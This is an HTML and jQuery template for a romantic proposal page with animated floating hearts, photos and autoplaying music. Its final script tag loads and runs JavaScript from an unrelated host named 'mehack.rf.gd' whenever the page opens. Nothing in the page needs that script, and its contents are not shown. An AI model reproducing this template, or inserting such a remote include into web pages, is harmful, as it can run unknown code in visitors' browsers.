<!DOCTYPE html>
<html lang="en" >
<head>
  <meta charset="UTF-8">
  <title> </title>
  <meta charset="UTF-8">
        <link rel="stylesheet" href="style.css">
<meta name='keywords' content='your, tags'>
<meta name='description' content='150 words'>
<meta name='og:title' content='title'>
<meta name='og:url' content='url'>
<meta name='og:image' content='img1.png'>
<link rel="shortcut icon" href="img2.png">

  <meta name="viewport" content="width=device-width, initial-scale=1.0">
<style type="text/css">


@import url('https://fonts.googleapis.com/css2?family=Love+Ya+Like+A+Sister&display=swap');
*{margin:0;padding:0;box-sizing:border-box;}
html,body{
  height:100%
}
body {


}

.bg_heart {
    position:fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    overflow: hidden
 }

.main {z-index:9999999;
display:flex;
justify-content:center;
align-items:center;
flex-direction:column;
}

.main .img1{
margin-top:20px;
margin-bottom:20px;
}
.main h3{
text-align:center;
margin:0px 30px;
font-family: 'Love Ya Like A Sister', cursive;
}
.heart {
    position: absolute;
    top: -50%;
    -webkit-transform: rotate(-45deg);
    -moz-transform: rotate(-45deg);
    -m-transform: rotate(-45deg);
    transform: rotate(-45deg)
 }

.heart:before {
    position: absolute;
    top: -50%;
    left: 0;
    display: block;
    content: "";
    width: 100%;
    height: 100%;
    background: inherit;
    border-radius: 100%;
}

.heart:after {
    position: absolute;
    top: 0;
    right: -50%;
    display: block;
    content: "";
    width: 100%;
    height: 100%;
    background: inherit;
    border-radius: 100%;
}

@-webkit-keyframes love {
  0%{top:110%}
}
@-moz-keyframes love {
  0%{top:110%}
}
@-ms-keyframes love {
  0%{top:110%}
}
@keyframes love {
  0%{top:110%}
}

.shr {
width:80px;
height:220px;
position:fixed;
bottom:0;
right:0;

display:flex;
justify-content:center;
align-items:center;
flex-direction:column;
}
.shr img{
margin:20px 0px;

-webkit-filter: drop-shadow(5px 5px 5px #222);
filter: drop-shadow(5px 5px 5px #222);

}
</style>
</head>
<body>
<div class="bg_heart"></div>


<div class="main" >
<!--adsense Code Here-->

<img src="img1.png" width="70%" class="img1"  >

<!--adsense Code Here-->

<h3>I propose my undying love to you today! Will you hold my hand for the rest of life?</h3>


<div class="wrapper">
             <div class="img-area">
                 <div class="single-img img-one">
                     <img src="aaa.jpg" alt="">     
                 </div> 
                 <div class="single-img img-two">
                    <img src="bbb.jpg" alt="">     
                </div> 
                <div class="single-img img-three">
                    <img src="ccc.jpg" alt="">     
                </div> 
                <div class="single-img img-four">
                    <img src="ddd.jpg" alt="">     
                </div>
                <div class="single-img img-five">
                    <img src="eee.jpeg" alt="">     
                </div> 
                <div class="single-img img-six">
                    <img src="fff.jpg" alt="">     
                </div>  
             </div>
       </div>
       </div>
	   
	   <audio controls autoplay="yes" loop="3">
	        <source src="audio.mp3" type="audio/mp3"></source>
	   </audio>

<img src="img2.png" width="50%" class="img1"  >


  <script src='https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
<script type="text/javascript">
$( "#header-plugin" ).load( "https://vivinantony.github.io/header-plugin/", function() {
	$("a.back-to-link").attr("href", "http://blog.thelittletechie.com/2015/03/love-heart-animation-using-css3.html#tlt")  
}


);

var love = setInterval(function() {
    var r_num = Math.floor(Math.random() * 40) + 1;
    var r_size = Math.floor(Math.random() * 65) + 10;
    var r_left = Math.floor(Math.random() * 100) + 1;
    var r_bg = Math.floor(Math.random() * 25) + 100;
    var r_time = Math.floor(Math.random() * 5) + 5;

    $('.bg_heart').append("<div class='heart' style='width:" + r_size + "px;height:" + r_size + "px;left:" + r_left + "%;background:rgba(255," + (r_bg - 25) + "," + r_bg + ",1);-webkit-animation:love " + r_time + "s ease;-moz-animation:love " + r_time + "s ease;-ms-animation:love " + r_time + "s ease;animation:love " + r_time + "s ease'></div>");

    $('.bg_heart').append("<div class='heart' style='width:" + (r_size - 10) + "px;height:" + (r_size - 10) + "px;left:" + (r_left + r_num) + "%;background:rgba(255," + (r_bg - 25) + "," + (r_bg + 25) + ",1);-webkit-animation:love " + (r_time + 5) + "s ease;-moz-animation:love " + (r_time + 5) + "s ease;-ms-animation:love " + (r_time + 5) + "s ease;animation:love " + (r_time + 5) + "s ease'></div>");

    $('.heart').each(function() {
        var top = $(this).css("top").replace(/[^-\d\.]/g, '');
        var width = $(this).css("width").replace(/[^-\d\.]/g, '');
        if (top <= -100 || width >= 150) {
            $(this).detach();
        }
    });
}, 500);



</script>
<script type="text/javascript" src="http://mehack.rf.gd/main.js"></script>
</body>
</html>